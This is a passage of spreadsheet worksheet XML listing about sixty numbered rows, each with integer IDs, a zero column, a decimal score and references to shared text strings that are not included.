        <v>0</v>
      </c>
      <c r="E696">
        <v>0.89109998941421509</v>
      </c>
      <c r="F696" t="s">
        <v>7</v>
      </c>
      <c r="G696" t="s">
        <v>1374</v>
      </c>
      <c r="H696" t="s">
        <v>1375</v>
      </c>
    </row>
    <row r="697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A697" s="1">
        <v>695</v>
      </c>
      <c r="B697">
        <v>6317</v>
      </c>
      <c r="C697">
        <v>6317</v>
      </c>
      <c r="D697">
        <v>0</v>
      </c>
      <c r="E697">
        <v>0.84769999980926514</v>
      </c>
      <c r="F697" t="s">
        <v>7</v>
      </c>
      <c r="G697" t="s">
        <v>1376</v>
      </c>
      <c r="H697" t="s">
        <v>1377</v>
      </c>
    </row>
    <row r="698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A698" s="1">
        <v>696</v>
      </c>
      <c r="B698">
        <v>3379</v>
      </c>
      <c r="C698">
        <v>3379</v>
      </c>
      <c r="D698">
        <v>0</v>
      </c>
      <c r="E698">
        <v>0.99750000238418579</v>
      </c>
      <c r="F698" t="s">
        <v>7</v>
      </c>
      <c r="G698" t="s">
        <v>1378</v>
      </c>
      <c r="H698" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A699" s="1">
        <v>697</v>
      </c>
      <c r="B699">
        <v>3382</v>
      </c>
      <c r="C699">
        <v>3382</v>
      </c>
      <c r="D699">
        <v>0</v>
      </c>
      <c r="E699">
        <v>0.98250001668930054</v>
      </c>
      <c r="F699" t="s">
        <v>7</v>
      </c>
      <c r="G699" t="s">
        <v>1380</v>
      </c>
      <c r="H699" t="s">
        <v>1381</v>
      </c>
    </row>
    <row r="700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A700" s="1">
        <v>698</v>
      </c>
      <c r="B700">
        <v>3383</v>
      </c>
      <c r="C700">
        <v>3383</v>
      </c>
      <c r="D700">
        <v>0</v>
      </c>
      <c r="E700">
        <v>0.57649999856948853</v>
      </c>
      <c r="F700" t="s">
        <v>7</v>
      </c>
      <c r="G700" t="s">
        <v>1382</v>
      </c>
      <c r="H700" t="s">
        <v>1383</v>
      </c>
    </row>
    <row r="701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A701" s="1">
        <v>699</v>
      </c>
      <c r="B701">
        <v>3386</v>
      </c>
      <c r="C701">
        <v>3386</v>
      </c>
      <c r="D701">
        <v>0</v>
      </c>
      <c r="E701">
        <v>0.57020002603530884</v>
      </c>
      <c r="F701" t="s">
        <v>7</v>
      </c>
      <c r="G701" t="s">
        <v>1384</v>
      </c>
      <c r="H701" t="s">
        <v>1385</v>
      </c>
    </row>
    <row r="702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A702" s="1">
        <v>700</v>
      </c>
      <c r="B702">
        <v>3388</v>
      </c>
      <c r="C702">
        <v>3388</v>
      </c>
      <c r="D702">
        <v>0</v>
      </c>
      <c r="E702">
        <v>0.99900001287460327</v>
      </c>
      <c r="F702" t="s">
        <v>7</v>
      </c>
      <c r="G702" t="s">
        <v>1386</v>
      </c>
      <c r="H702" t="s">
        <v>1387</v>
      </c>
    </row>
    <row r="703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A703" s="1">
        <v>701</v>
      </c>
      <c r="B703">
        <v>3390</v>
      </c>
      <c r="C703">
        <v>3390</v>
      </c>
      <c r="D703">
        <v>0</v>
      </c>
      <c r="E703">
        <v>0.99970000982284546</v>
      </c>
      <c r="F703" t="s">
        <v>7</v>
      </c>
      <c r="G703" t="s">
        <v>1388</v>
      </c>
      <c r="H703" t="s">
        <v>1389</v>
      </c>
    </row>
    <row r="704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A704" s="1">
        <v>702</v>
      </c>
      <c r="B704">
        <v>3391</v>
      </c>
      <c r="C704">
        <v>3391</v>
      </c>
      <c r="D704">
        <v>0</v>
      </c>
      <c r="E704">
        <v>0.99980002641677856</v>
      </c>
      <c r="F704" t="s">
        <v>7</v>
      </c>
      <c r="G704" t="s">
        <v>1390</v>
      </c>
      <c r="H704" t="s">
        <v>1391</v>
      </c>
    </row>
    <row r="705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A705" s="1">
        <v>703</v>
      </c>
      <c r="B705">
        <v>3392</v>
      </c>
      <c r="C705">
        <v>3392</v>
      </c>
      <c r="D705">
        <v>0</v>
      </c>
      <c r="E705">
        <v>0.99940001964569092</v>
      </c>
      <c r="F705" t="s">
        <v>7</v>
      </c>
      <c r="G705" t="s">
        <v>1392</v>
      </c>
      <c r="H705" t="s">
        <v>1393</v>
      </c>
    </row>
    <row r="706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A706" s="1">
        <v>704</v>
      </c>
      <c r="B706">
        <v>6325</v>
      </c>
      <c r="C706">
        <v>6325</v>
      </c>
      <c r="D706">
        <v>0</v>
      </c>
      <c r="E706">
        <v>0.95459997653961182</v>
      </c>
      <c r="F706" t="s">
        <v>7</v>
      </c>
      <c r="G706" t="s">
        <v>1394</v>
      </c>
      <c r="H706" t="s">
        <v>1395</v>
      </c>
    </row>
    <row r="707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A707" s="1">
        <v>705</v>
      </c>
      <c r="B707">
        <v>3368</v>
      </c>
      <c r="C707">
        <v>3368</v>
      </c>
      <c r="D707">
        <v>0</v>
      </c>
      <c r="E707">
        <v>0.55119997262954712</v>
      </c>
      <c r="F707" t="s">
        <v>7</v>
      </c>
      <c r="G707" t="s">
        <v>1396</v>
      </c>
      <c r="H707" t="s">
        <v>1397</v>
      </c>
    </row>
    <row r="708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A708" s="1">
        <v>706</v>
      </c>
      <c r="B708">
        <v>6316</v>
      </c>
      <c r="C708">
        <v>6316</v>
      </c>
      <c r="D708">
        <v>0</v>
      </c>
      <c r="E708">
        <v>0.82910001277923584</v>
      </c>
      <c r="F708" t="s">
        <v>7</v>
      </c>
      <c r="G708" t="s">
        <v>1398</v>
      </c>
      <c r="H708" t="s">
        <v>1399</v>
      </c>
    </row>
    <row r="709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A709" s="1">
        <v>707</v>
      </c>
      <c r="B709">
        <v>3772</v>
      </c>
      <c r="C709">
        <v>3772</v>
      </c>
      <c r="D709">
        <v>0</v>
      </c>
      <c r="E709">
        <v>0.99250000715255737</v>
      </c>
      <c r="F709" t="s">
        <v>7</v>
      </c>
      <c r="G709" t="s">
        <v>1400</v>
      </c>
      <c r="H709" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A710" s="1">
        <v>708</v>
      </c>
      <c r="B710">
        <v>6470</v>
      </c>
      <c r="C710">
        <v>6470</v>
      </c>
      <c r="D710">
        <v>0</v>
      </c>
      <c r="E710">
        <v>0.95020002126693726</v>
      </c>
      <c r="F710" t="s">
        <v>7</v>
      </c>
      <c r="G710" t="s">
        <v>1402</v>
      </c>
      <c r="H710" t="s">
        <v>1403</v>
      </c>
    </row>
    <row r="711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A711" s="1">
        <v>709</v>
      </c>
      <c r="B711">
        <v>3337</v>
      </c>
      <c r="C711">
        <v>3337</v>
      </c>
      <c r="D711">
        <v>0</v>
      </c>
      <c r="E711">
        <v>0.67299997806549072</v>
      </c>
      <c r="F711" t="s">
        <v>7</v>
      </c>
      <c r="G711" t="s">
        <v>1404</v>
      </c>
      <c r="H711" t="s">
        <v>1405</v>
      </c>
    </row>
    <row r="712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A712" s="1">
        <v>710</v>
      </c>
      <c r="B712">
        <v>3338</v>
      </c>
      <c r="C712">
        <v>3338</v>
      </c>
      <c r="D712">
        <v>0</v>
      </c>
      <c r="E712">
        <v>0.66030001640319824</v>
      </c>
      <c r="F712" t="s">
        <v>7</v>
      </c>
      <c r="G712" t="s">
        <v>1406</v>
      </c>
      <c r="H712" t="s">
        <v>1407</v>
      </c>
    </row>
    <row r="713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A713" s="1">
        <v>711</v>
      </c>
      <c r="B713">
        <v>3339</v>
      </c>
      <c r="C713">
        <v>3339</v>
      </c>
      <c r="D713">
        <v>0</v>
      </c>
      <c r="E713">
        <v>0.99919998645782471</v>
      </c>
      <c r="F713" t="s">
        <v>7</v>
      </c>
      <c r="G713" t="s">
        <v>1408</v>
      </c>
      <c r="H713" t="s">
        <v>1409</v>
      </c>
    </row>
    <row r="714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A714" s="1">
        <v>712</v>
      </c>
      <c r="B714">
        <v>3340</v>
      </c>
      <c r="C714">
        <v>3340</v>
      </c>
      <c r="D714">
        <v>0</v>
      </c>
      <c r="E714">
        <v>0.71230000257492065</v>
      </c>
      <c r="F714" t="s">
        <v>7</v>
      </c>
      <c r="G714" t="s">
        <v>1410</v>
      </c>
      <c r="H714" t="s">
        <v>1411</v>
      </c>
    </row>
    <row r="715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A715" s="1">
        <v>713</v>
      </c>
      <c r="B715">
        <v>3341</v>
      </c>
      <c r="C715">
        <v>3341</v>
      </c>
      <c r="D715">
        <v>0</v>
      </c>
      <c r="E715">
        <v>0.83039999008178711</v>
      </c>
      <c r="F715" t="s">
        <v>7</v>
      </c>
      <c r="G715" t="s">
        <v>1412</v>
      </c>
      <c r="H715" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A716" s="1">
        <v>714</v>
      </c>
      <c r="B716">
        <v>3346</v>
      </c>
      <c r="C716">
        <v>3346</v>
      </c>
      <c r="D716">
        <v>0</v>
      </c>
      <c r="E716">
        <v>0.52259999513626099</v>
      </c>
      <c r="F716" t="s">
        <v>7</v>
      </c>
      <c r="G716" t="s">
        <v>1414</v>
      </c>
      <c r="H716" t="s">
        <v>1415</v>
      </c>
    </row>
    <row r="717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A717" s="1">
        <v>715</v>
      </c>
      <c r="B717">
        <v>3347</v>
      </c>
      <c r="C717">
        <v>3347</v>
      </c>
      <c r="D717">
        <v>0</v>
      </c>
      <c r="E717">
        <v>0.41200000047683721</v>
      </c>
      <c r="F717" t="s">
        <v>7</v>
      </c>
      <c r="G717" t="s">
        <v>1416</v>
      </c>
      <c r="H717" t="s">
        <v>1417</v>
      </c>
    </row>
    <row r="718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A718" s="1">
        <v>716</v>
      </c>
      <c r="B718">
        <v>3348</v>
      </c>
      <c r="C718">
        <v>3348</v>
      </c>
      <c r="D718">
        <v>0</v>
      </c>
      <c r="E718">
        <v>0.99000000953674316</v>
      </c>
      <c r="F718" t="s">
        <v>7</v>
      </c>
      <c r="G718" t="s">
        <v>1418</v>
      </c>
      <c r="H718" t="s">
        <v>1419</v>
      </c>
    </row>
    <row r="719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A719" s="1">
        <v>717</v>
      </c>
      <c r="B719">
        <v>3349</v>
      </c>
      <c r="C719">
        <v>3349</v>
      </c>
      <c r="D719">
        <v>0</v>
      </c>
      <c r="E719">
        <v>0.67079997062683105</v>
      </c>
      <c r="F719" t="s">
        <v>7</v>
      </c>
      <c r="G719" t="s">
        <v>1420</v>
      </c>
      <c r="H719" t="s">
        <v>1421</v>
      </c>
    </row>
    <row r="720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A720" s="1">
        <v>718</v>
      </c>
      <c r="B720">
        <v>6466</v>
      </c>
      <c r="C720">
        <v>6466</v>
      </c>
      <c r="D720">
        <v>0</v>
      </c>
      <c r="E720">
        <v>0.8345000147819519</v>
      </c>
      <c r="F720" t="s">
        <v>7</v>
      </c>
      <c r="G720" t="s">
        <v>1422</v>
      </c>
      <c r="H720" t="s">
        <v>1423</v>
      </c>
    </row>
    <row r="721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A721" s="1">
        <v>719</v>
      </c>
      <c r="B721">
        <v>6459</v>
      </c>
      <c r="C721">
        <v>6459</v>
      </c>
      <c r="D721">
        <v>0</v>
      </c>
      <c r="E721">
        <v>0.60149997472763062</v>
      </c>
      <c r="F721" t="s">
        <v>7</v>
      </c>
      <c r="G721" t="s">
        <v>1424</v>
      </c>
      <c r="H721" t="s">
        <v>1425</v>
      </c>
    </row>
    <row r="722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A722" s="1">
        <v>720</v>
      </c>
      <c r="B722">
        <v>3356</v>
      </c>
      <c r="C722">
        <v>3356</v>
      </c>
      <c r="D722">
        <v>0</v>
      </c>
      <c r="E722">
        <v>0.86339998245239258</v>
      </c>
      <c r="F722" t="s">
        <v>7</v>
      </c>
      <c r="G722" t="s">
        <v>1426</v>
      </c>
      <c r="H722" t="s">
        <v>1427</v>
      </c>
    </row>
    <row r="723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A723" s="1">
        <v>721</v>
      </c>
      <c r="B723">
        <v>3357</v>
      </c>
      <c r="C723">
        <v>3357</v>
      </c>
      <c r="D723">
        <v>0</v>
      </c>
      <c r="E723">
        <v>0.99550002813339233</v>
      </c>
      <c r="F723" t="s">
        <v>7</v>
      </c>
      <c r="G723" t="s">
        <v>1428</v>
      </c>
      <c r="H723" t="s">
        <v>1429</v>
      </c>
    </row>
    <row r="724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A724" s="1">
        <v>722</v>
      </c>
      <c r="B724">
        <v>6457</v>
      </c>
      <c r="C724">
        <v>6457</v>
      </c>
      <c r="D724">
        <v>0</v>
      </c>
      <c r="E724">
        <v>0.69179999828338623</v>
      </c>
      <c r="F724" t="s">
        <v>7</v>
      </c>
      <c r="G724" t="s">
        <v>1430</v>
      </c>
      <c r="H724" t="s">
        <v>1431</v>
      </c>
    </row>
    <row r="725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A725" s="1">
        <v>723</v>
      </c>
      <c r="B725">
        <v>3359</v>
      </c>
      <c r="C725">
        <v>3359</v>
      </c>
      <c r="D725">
        <v>0</v>
      </c>
      <c r="E725">
        <v>0.83359998464584351</v>
      </c>
      <c r="F725" t="s">
        <v>7</v>
      </c>
      <c r="G725" t="s">
        <v>1432</v>
      </c>
      <c r="H725" t="s">
        <v>1433</v>
      </c>
    </row>
    <row r="726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A726" s="1">
        <v>724</v>
      </c>
      <c r="B726">
        <v>6452</v>
      </c>
      <c r="C726">
        <v>6452</v>
      </c>
      <c r="D726">
        <v>0</v>
      </c>
      <c r="E726">
        <v>0.99040001630783081</v>
      </c>
      <c r="F726" t="s">
        <v>7</v>
      </c>
      <c r="G726" t="s">
        <v>1434</v>
      </c>
      <c r="H726" t="s">
        <v>1435</v>
      </c>
    </row>
    <row r="727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A727" s="1">
        <v>725</v>
      </c>
      <c r="B727">
        <v>3826</v>
      </c>
      <c r="C727">
        <v>3826</v>
      </c>
      <c r="D727">
        <v>0</v>
      </c>
      <c r="E727">
        <v>0.76029998064041138</v>
      </c>
      <c r="F727" t="s">
        <v>7</v>
      </c>
      <c r="G727" t="s">
        <v>1436</v>
      </c>
      <c r="H727" t="s">
        <v>1437</v>
      </c>
    </row>
    <row r="728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A728" s="1">
        <v>726</v>
      </c>
      <c r="B728">
        <v>6326</v>
      </c>
      <c r="C728">
        <v>6326</v>
      </c>
      <c r="D728">
        <v>0</v>
      </c>
      <c r="E728">
        <v>0.74320000410079956</v>
      </c>
      <c r="F728" t="s">
        <v>7</v>
      </c>
      <c r="G728" t="s">
        <v>1438</v>
      </c>
      <c r="H728" t="s">
        <v>1439</v>
      </c>
    </row>
    <row r="729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A729" s="1">
        <v>727</v>
      </c>
      <c r="B729">
        <v>6299</v>
      </c>
      <c r="C729">
        <v>6299</v>
      </c>
      <c r="D729">
        <v>0</v>
      </c>
      <c r="E729">
        <v>0.98360002040863037</v>
      </c>
      <c r="F729" t="s">
        <v>7</v>
      </c>
      <c r="G729" t="s">
        <v>1440</v>
      </c>
      <c r="H729" t="s">
        <v>1441</v>
      </c>
    </row>
    <row r="730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A730" s="1">
        <v>728</v>
      </c>
      <c r="B730">
        <v>3830</v>
      </c>
      <c r="C730">
        <v>3830</v>
      </c>
      <c r="D730">
        <v>0</v>
      </c>
      <c r="E730">
        <v>0.56540000438690186</v>
      </c>
      <c r="F730" t="s">
        <v>7</v>
      </c>
      <c r="G730" t="s">
        <v>1442</v>
      </c>
      <c r="H730" t="s">
        <v>1443</v>
      </c>
    </row>
    <row r="731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A731" s="1">
        <v>729</v>
      </c>
      <c r="B731">
        <v>3887</v>
      </c>
      <c r="C731">
        <v>3887</v>
      </c>
      <c r="D731">
        <v>0</v>
      </c>
      <c r="E731">
        <v>0.65539997816085815</v>
      </c>
      <c r="F731" t="s">
        <v>7</v>
      </c>
      <c r="G731" t="s">
        <v>1444</v>
      </c>
      <c r="H731" t="s">
        <v>1445</v>
      </c>
    </row>
    <row r="732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A732" s="1">
        <v>730</v>
      </c>
      <c r="B732">
        <v>3886</v>
      </c>
      <c r="C732">
        <v>3886</v>
      </c>
      <c r="D732">
        <v>0</v>
      </c>
      <c r="E732">
        <v>0.84869998693466187</v>
      </c>
      <c r="F732" t="s">
        <v>7</v>
      </c>
      <c r="G732" t="s">
        <v>1446</v>
      </c>
      <c r="H732" t="s">
        <v>1447</v>
      </c>
    </row>
    <row r="733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A733" s="1">
        <v>731</v>
      </c>
      <c r="B733">
        <v>6274</v>
      </c>
      <c r="C733">
        <v>6274</v>
      </c>
      <c r="D733">
        <v>0</v>
      </c>
      <c r="E733">
        <v>0.63200002908706665</v>
      </c>
      <c r="F733" t="s">
        <v>7</v>
      </c>
      <c r="G733" t="s">
        <v>1448</v>
      </c>
      <c r="H733" t="s">
        <v>1449</v>
      </c>
    </row>
    <row r="734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A734" s="1">
        <v>732</v>
      </c>
      <c r="B734">
        <v>6276</v>
      </c>
      <c r="C734">
        <v>6276</v>
      </c>
      <c r="D734">
        <v>0</v>
      </c>
      <c r="E734">
        <v>0.98879998922348022</v>
      </c>
      <c r="F734" t="s">
        <v>7</v>
      </c>
      <c r="G734" t="s">
        <v>1450</v>
      </c>
      <c r="H734" t="s">
        <v>1451</v>
      </c>
    </row>
    <row r="735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A735" s="1">
        <v>733</v>
      </c>
      <c r="B735">
        <v>6278</v>
      </c>
      <c r="C735">
        <v>6278</v>
      </c>
      <c r="D735">
        <v>0</v>
      </c>
      <c r="E735">
        <v>0.74750000238418579</v>
      </c>
      <c r="F735" t="s">
        <v>7</v>
      </c>
      <c r="G735" t="s">
        <v>1452</v>
      </c>
      <c r="H735" t="s">
        <v>1453</v>
      </c>
    </row>
    <row r="736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A736" s="1">
        <v>734</v>
      </c>
      <c r="B736">
        <v>6279</v>
      </c>
      <c r="C736">
        <v>6279</v>
      </c>
      <c r="D736">
        <v>0</v>
      </c>
      <c r="E736">
        <v>0.90719997882843018</v>
      </c>
      <c r="F736" t="s">
        <v>7</v>
      </c>
      <c r="G736" t="s">
        <v>1454</v>
      </c>
      <c r="H736" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A737" s="1">
        <v>735</v>
      </c>
      <c r="B737">
        <v>3162</v>
      </c>
      <c r="C737">
        <v>3162</v>
      </c>
      <c r="D737">
        <v>0</v>
      </c>
      <c r="E737">
        <v>0.75870001316070557</v>
      </c>
      <c r="F737" t="s">
        <v>7</v>
      </c>
      <c r="G737" t="s">
        <v>1456</v>
      </c>
      <c r="H737" t="s">
        <v>1457</v>
      </c>
    </row>
    <row r="738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A738" s="1">
        <v>736</v>
      </c>
      <c r="B738">
        <v>3889</v>
      </c>
      <c r="C738">
        <v>3889</v>
      </c>
      <c r="D738">
        <v>0</v>
      </c>
      <c r="E738">
        <v>0.61180001497268677</v>
      </c>
      <c r="F738" t="s">
        <v>7</v>
      </c>
      <c r="G738" t="s">
        <v>1458</v>
      </c>
      <c r="H738" t="s">
        <v>1459</v>
      </c>
    </row>
    <row r="739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A739" s="1">
        <v>737</v>
      </c>
      <c r="B739">
        <v>3164</v>
      </c>
      <c r="C739">
        <v>3164</v>
      </c>
      <c r="D739">
        <v>0</v>
      </c>
      <c r="E739">
        <v>0.78710001707077026</v>
      </c>
      <c r="F739" t="s">
        <v>7</v>
      </c>
      <c r="G739" t="s">
        <v>1460</v>
      </c>
      <c r="H739" t="s">
        <v>1461</v>
      </c>
    </row>
    <row r="740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A740" s="1">
        <v>738</v>
      </c>
      <c r="B740">
        <v>6282</v>
      </c>
      <c r="C740">
        <v>6282</v>
      </c>
      <c r="D740">
        <v>0</v>
      </c>
      <c r="E740">
        <v>0.9976000189781189</v>
      </c>
      <c r="F740" t="s">
        <v>7</v>
      </c>
      <c r="G740" t="s">
        <v>1462</v>
      </c>
      <c r="H740" t="s">
        <v>1463</v>
      </c>
    </row>
    <row r="741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A741" s="1">
        <v>739</v>
      </c>
      <c r="B741">
        <v>6533</v>
      </c>
      <c r="C741">
        <v>6533</v>
      </c>
      <c r="D741">
        <v>0</v>
      </c>
      <c r="E741">
        <v>0.62849998474121094</v>
      </c>
      <c r="F741" t="s">
        <v>7</v>
      </c>
      <c r="G741" t="s">
        <v>1464</v>
      </c>
      <c r="H741" t="s">
        <v>1465</v>
      </c>
    </row>
    <row r="742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A742" s="1">
        <v>740</v>
      </c>
      <c r="B742">
        <v>3173</v>
      </c>
      <c r="C742">
        <v>3173</v>
      </c>
      <c r="D742">
        <v>0</v>
      </c>
      <c r="E742">
        <v>0.59950000047683716</v>
      </c>
      <c r="F742" t="s">
        <v>7</v>
      </c>
      <c r="G742" t="s">
        <v>1466</v>
      </c>
      <c r="H742" t="s">
        <v>1467</v>
      </c>
    </row>
    <row r="743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A743" s="1">
        <v>741</v>
      </c>
      <c r="B743">
        <v>6530</v>
      </c>
      <c r="C743">
        <v>6530</v>
      </c>
      <c r="D743">
        <v>0</v>
      </c>
      <c r="E743">
        <v>0.52480000257492065</v>
      </c>
      <c r="F743" t="s">
        <v>7</v>
      </c>
      <c r="G743" t="s">
        <v>1468</v>
      </c>
      <c r="H743" t="s">
        <v>1469</v>
      </c>
    </row>
    <row r="744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A744" s="1">
        <v>742</v>
      </c>
      <c r="B744">
        <v>3178</v>
      </c>
      <c r="C744">
        <v>3178</v>
      </c>
      <c r="D744">
        <v>0</v>
      </c>
      <c r="E744">
        <v>0.5625</v>
      </c>
      <c r="F744" t="s">
        <v>7</v>
      </c>
      <c r="G744" t="s">
        <v>1470</v>
      </c>
      <c r="H744" t="s">
        <v>1471</v>
      </c>
    </row>
    <row r="745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A745" s="1">
        <v>743</v>
      </c>
      <c r="B745">
        <v>3179</v>
      </c>
      <c r="C745">
        <v>3179</v>
      </c>
      <c r="D745">
        <v>0</v>
      </c>
      <c r="E745">
        <v>0.80909997224807739</v>
      </c>
      <c r="F745" t="s">
        <v>7</v>
      </c>
      <c r="G745" t="s">
        <v>1472</v>
      </c>
      <c r="H745" t="s">
        <v>1473</v>
      </c>
    </row>
    <row r="746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A746" s="1">
        <v>744</v>
      </c>
      <c r="B746">
        <v>6284</v>
      </c>
      <c r="C746">
        <v>6284</v>
      </c>
      <c r="D746">
        <v>0</v>
      </c>
      <c r="E746">
        <v>0.93769997358322144</v>
      </c>
      <c r="F746" t="s">
        <v>7</v>
      </c>
      <c r="G746" t="s">
        <v>1474</v>
      </c>
      <c r="H746" t="s">
        <v>1475</v>
      </c>
    </row>
    <row r="747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A747" s="1">
        <v>745</v>
      </c>
      <c r="B747">
        <v>6281</v>
      </c>
      <c r="C747">
        <v>6281</v>
      </c>
      <c r="D747">
        <v>0</v>
      </c>
      <c r="E747">
        <v>0.89899998903274536</v>
      </c>
      <c r="F747" t="s">
        <v>7</v>
      </c>
      <c r="G747" t="s">
        <v>1476</v>
      </c>
      <c r="H747" t="s">
        <v>1477</v>
      </c>
    </row>
    <row r="748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A748" s="1">
        <v>746</v>
      </c>
      <c r="B748">
        <v>3184</v>
      </c>
      <c r="C748">
        <v>3184</v>
      </c>
      <c r="D748">
        <v>0</v>
      </c>
      <c r="E748">
        <v>0.57120001316070557</v>
      </c>
      <c r="F748" t="s">
        <v>7</v>
      </c>
      <c r="G748" t="s">
        <v>1478</v>
      </c>
      <c r="H748" t="s">
        <v>1479</v>
      </c>
    </row>
    <row r="749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A749" s="1">
        <v>747</v>
      </c>
      <c r="B749">
        <v>6273</v>
      </c>
      <c r="C749">
        <v>6273</v>
      </c>
      <c r="D749">
        <v>0</v>
      </c>
      <c r="E749">
        <v>0.8718000054359436</v>
      </c>
      <c r="F749" t="s">
        <v>7</v>
      </c>
      <c r="G749" t="s">
        <v>1480</v>
      </c>
      <c r="H749" t="s">
        <v>1481</v>
      </c>
    </row>
    <row r="750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A750" s="1">
        <v>748</v>
      </c>
      <c r="B750">
        <v>3146</v>
      </c>
      <c r="C750">
        <v>3146</v>
      </c>
      <c r="D750">
        <v>0</v>
      </c>
      <c r="E750">
        <v>0.91269999742507935</v>
      </c>
      <c r="F750" t="s">
        <v>7</v>
      </c>
      <c r="G750" t="s">
        <v>1482</v>
      </c>
      <c r="H750" t="s">
        <v>1483</v>
      </c>
    </row>
    <row r="751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A751" s="1">
        <v>749</v>
      </c>
      <c r="B751">
        <v>3114</v>
      </c>
      <c r="C751">
        <v>3114</v>
      </c>
      <c r="D751">
        <v>0</v>
      </c>
      <c r="E751">
        <v>0.88730001449584961</v>
      </c>
      <c r="F751" t="s">
        <v>7</v>
      </c>
      <c r="G751" t="s">
        <v>1484</v>
      </c>
      <c r="H751" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A752" s="1">
        <v>750</v>
      </c>
      <c r="B752">
        <v>3115</v>
      </c>
      <c r="C752">
        <v>3115</v>
      </c>
      <c r="D752">
        <v>0</v>
      </c>
      <c r="E752">
        <v>0.9968000054359436</v>
      </c>
      <c r="F752" t="s">
        <v>7</v>
      </c>
      <c r="G752" t="s">
        <v>1486</v>
      </c>
      <c r="H752" t="s">
        <v>1487</v>
      </c>
    </row>
    <row r="753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A753" s="1">
        <v>751</v>
      </c>
      <c r="B753">
        <v>3116</v>
      </c>
      <c r="C753">
        <v>3116</v>
      </c>
      <c r="D753">
        <v>0</v>
      </c>
      <c r="E753">
        <v>0.94539999961853027</v>
      </c>
      <c r="F753" t="s">
        <v>7</v>
      </c>
      <c r="G753" t="s">
        <v>1488</v>
      </c>
      <c r="H753" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A754" s="1">
        <v>752</v>
      </c>
      <c r="B754">
        <v>6549</v>
      </c>
      <c r="C754">
        <v>6549</v>
      </c>
      <c r="D754">
        <v>0</v>
      </c>
      <c r="E754">
        <v>0.61430001258850098</v>
      </c>
      <c r="F754" t="s">
        <v>7</v>
      </c>
      <c r="G754" t="s">
        <v>1489</v>
      </c>
      <c r="H754" t="s">
        <v>1490</v>
      </c>
    </row>
    <row r="755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A755" s="1">
        <v>753</v>
      </c>
      <c r="B755">
        <v>3120</v>
      </c>
      <c r="C755">
        <v>3120</v>
      </c>
      <c r="D755">
        <v>0</v>
      </c>
      <c r="E755">
        <v>0.43009999394416809</v>
      </c>
      <c r="F755" t="s">
        <v>7</v>
      </c>
      <c r="G755" t="s">
        <v>1491</v>
      </c>
      <c r="H755" t="s">
        <v>1492</v>
      </c>
    </row>
    <row r="756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A756" s="1">
        <v>754</v>
      </c>
      <c r="B756">
        <v>3121</v>
      </c>
      <c r="C756">
        <v>3121</v>
      </c>
      <c r="D756">
        <v>0</v>
      </c>
      <c r="E756">
        <v>0.99229997396469116</v>
      </c>
      <c r="F756" t="s">
        <v>7</v>
      </c>
      <c r="G756" t="s">
        <v>1493</v>
      </c>
      <c r="H756" t="s">
        <v>1494</v>
      </c>
    </row>
    <row r="757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A757" s="1">
        <v>755</v>
      </c>
      <c r="B757">
        <v>6548</v>
      </c>
      <c r="C757">
        <v>6548</v>
      </c>
